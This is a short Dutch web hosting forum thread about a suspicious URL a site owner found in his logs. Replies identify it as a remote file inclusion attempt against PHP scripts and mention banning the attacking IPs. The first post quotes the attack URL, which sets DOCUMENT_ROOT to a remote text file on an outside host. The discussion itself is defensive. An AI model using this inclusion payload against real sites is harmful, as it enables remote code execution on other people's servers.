Exploit in php?

Onderwerp: Exploit in php?

  1. Exploit in php?

    shuyg said:

    Exploit in php?

    Ik kwam vandaag de volgende URL tegen?
    /products/?id=34/?_SERVER[DOCUMENT_ROOT]=http://sito.blackdrag0n.net/Cartoon/idnew.txt?

    Dit lijkt op een exploit voor php. Is er iemand bekend met een exploit?

    Bij mij heeft het dus geen effect gehad, maar ik kan me voorstellen dat er bij een iets andere configuratie wel problemen zouden zijn.
  2. Mikey's Avatar

    Mikey said:
    niet in php, maar in de code van het betreffende product
    "Zo zijn ook wij één leverancier. Dé leverancier in gedegen Linux kennis, wanneer jij dat nodig hebt."
    Boek je admin vandaag nog via : www.admin.nu
    Gevestigd in Nederland en Moldavië

    Lees hier de webhostingtalk.nl forum regels en voorwaarden!
  3. Exploit in php?

    Stewie said:
    Er zijn wat pauper producten die daar kwetsbaar voor zijn. Zo'n "aanval" krijgen wij elke dag wel tienmaal op de site. IPs worden netjes gepermbanned.
    De standpunten en meningen op dit discussieforum zijn persoonlijk van aard en vertegenwoordigen in geen geval eventuele officiële standpunten van derden.
    Lees hier de webhostingtalk.nl forum regels en voorwaarden!
  4. Exploit in php?

    shuyg said:
    Het is een eigen script, dus het is geen standaard product. Enig idee welk product hier dan kwetsbaar voor zou zijn?
  5. Mikey's Avatar

    Mikey said:
    zoek maar op remote file inclusion exploit
    "Zo zijn ook wij één leverancier. Dé leverancier in gedegen Linux kennis, wanneer jij dat nodig hebt."
    Boek je admin vandaag nog via : www.admin.nu
    Gevestigd in Nederland en Moldavië

    Lees hier de webhostingtalk.nl forum regels en voorwaarden!
  6. Exploit in php?

    Ahmed said:
    Het enige wat dat script doet, is gegevens over de server opslaan
  7. Exploit in php?

    Stewie said:
    Citaat Oorspronkelijk geplaatst door Ahmed Bekijk Berichten
    Het enige wat dat script doet, is gegevens over de server opslaan
    Dit script misschien wel, maar zodra ze dat kunnen, kunnen ze ook andere code uitvoeren op het systeem.
    De standpunten en meningen op dit discussieforum zijn persoonlijk van aard en vertegenwoordigen in geen geval eventuele officiële standpunten van derden.
    Lees hier de webhostingtalk.nl forum regels en voorwaarden!
  8. Exploit in php?

    shuyg said:
    Ja, dat zijn bekende exploits.
    Wat ik meer opvallend vond, is de poging om $_SERVER['DOCUMENT_ROOT'] een andere waarde te geven. Dat lijkt me alleen mogelijk als PHP dat toe staat.